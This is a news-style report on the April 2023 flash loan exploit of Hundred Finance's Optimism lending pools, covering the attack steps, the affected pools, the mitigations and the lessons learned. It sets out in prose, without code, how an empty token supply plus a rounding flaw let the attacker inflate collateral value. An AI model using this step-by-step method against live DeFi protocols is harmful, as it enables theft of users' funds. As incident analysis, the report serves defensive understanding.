Hundred Finance Suffers $7 Million Flash Loan Exploit on Optimism Network

The decentralized lending protocol Hundred Finance fell victim to a sophisticated flash loan attack on April 15, 2023, resulting in the loss of approximately $7 million worth of digital assets on the Optimism layer-2 blockchain. The breach underscores the persistent vulnerabilities that continue to challenge DeFi platforms, even those built on battle-tested codebases.

The Exploit Mechanics

The attack commenced at 14:12 UTC when the attacker initiated a flash loan through Aave, borrowing 500 WBTC (Wrapped Bitcoin). With Bitcoin trading at approximately $30,318 at the time, this represented a substantial borrowing position. The attacker exploited a critical vulnerability in Hundred Finance’s hWBTC token contract, which had minimal existing lending activity.

The attacker first redeemed previously deposited WBTC, causing the total supply of hWBTC tokens to drop to zero. They then created a minimal proxy contract and deposited 4 WBTC, receiving 200 hWBTC in return. By strategically redeeming WBTC until only 2 wei of hWBTC remained, the attacker set the stage for the price manipulation that followed.

The attacker then transferred the 500 WBTC from the flash loan into the pool, which dramatically increased the price of hWBTC due to the extremely low total supply. This inflated borrowing power allowed the attacker to borrow a significant amount of ETH, valued at approximately $2,092 per token on that date.

A critical factor was the contract’s use of Solidity version 0.5.16, which employed a calculation library to prevent integer overflow. This library introduced a rounding behavior that meant redeeming 500 WBTC required only 1 wei of hWBTC, enabling the attacker to extract far more value than their actual collateral position justified.

Affected Systems

The exploit specifically targeted Hundred Finance’s deployment on the Optimism network, a layer-2 scaling solution for Ethereum. The protocol, which is a fork of Compound’s lending codebase, operated across multiple chains but the vulnerability was most acute on the Optimism deployment where hWBTC had limited lending activity.

Multiple lending pools were drained in the attack sequence. After the initial hWBTC exploit, the attacker repeated the process across other token pools, compounding the total losses. The absence of existing borrowers in the hWBTC market was a prerequisite condition that made the attack possible.

The attack did not affect Hundred Finance’s deployments on other networks, highlighting how identical code can exhibit different risk profiles depending on the liquidity conditions and usage patterns on each chain.

The Mitigation Strategy

Following the exploit, Hundred Finance acknowledged the hack publicly and stated they were in discussions with multiple security teams to investigate the incident. The team attempted to establish communication with the attacker, expressing hope for a mutually agreeable resolution.

They also requested that affected users based in the United States, particularly in New York, reach out through direct messages on social media or via Discord to coordinate potential recovery efforts. The team advised against speculation about the attack methodology while they prepared a comprehensive post-mortem report.

For the broader DeFi ecosystem, the attack highlights several mitigation strategies. Protocols should implement minimum liquidity requirements for lending pools to prevent the total supply of hTokens from reaching critically low levels. Additionally, upgrading from older Solidity versions to newer releases with native overflow protection could eliminate the rounding vulnerabilities that enabled this attack.

Lessons Learned

The Hundred Finance exploit reinforces several critical lessons for DeFi protocols. First, forking established codebases like Compound does not automatically confer security. The same code can behave differently under different liquidity conditions, and protocols must account for edge cases where token supplies approach zero.

Second, flash loan attacks remain one of the most potent threat vectors in DeFi. The ability to borrow massive amounts of capital without collateral, even momentarily, creates opportunities for price manipulation that can cascade across interconnected protocols.

Third, rounding errors in smart contracts can have outsized consequences. The difference between 1 wei and 2 wei might seem negligible, but when amplified by a large token position, it can enable the extraction of millions of dollars in value.

User Action Required

Users who had funds deposited in Hundred Finance’s Optimism deployment should monitor official communication channels for updates on recovery efforts. As a general precaution, users should evaluate whether their funds are spread across multiple protocols to reduce exposure to single-point failures. When interacting with lending protocols, it is advisable to check the liquidity depth and usage statistics of the markets you participate in, as low-liquidity pools present elevated risk profiles. Always verify that protocols you use have undergone recent security audits and maintain active bug bounty programs.

Disclaimer: This article is for informational purposes only and does not constitute financial advice. Always conduct your own research before engaging with any DeFi protocol.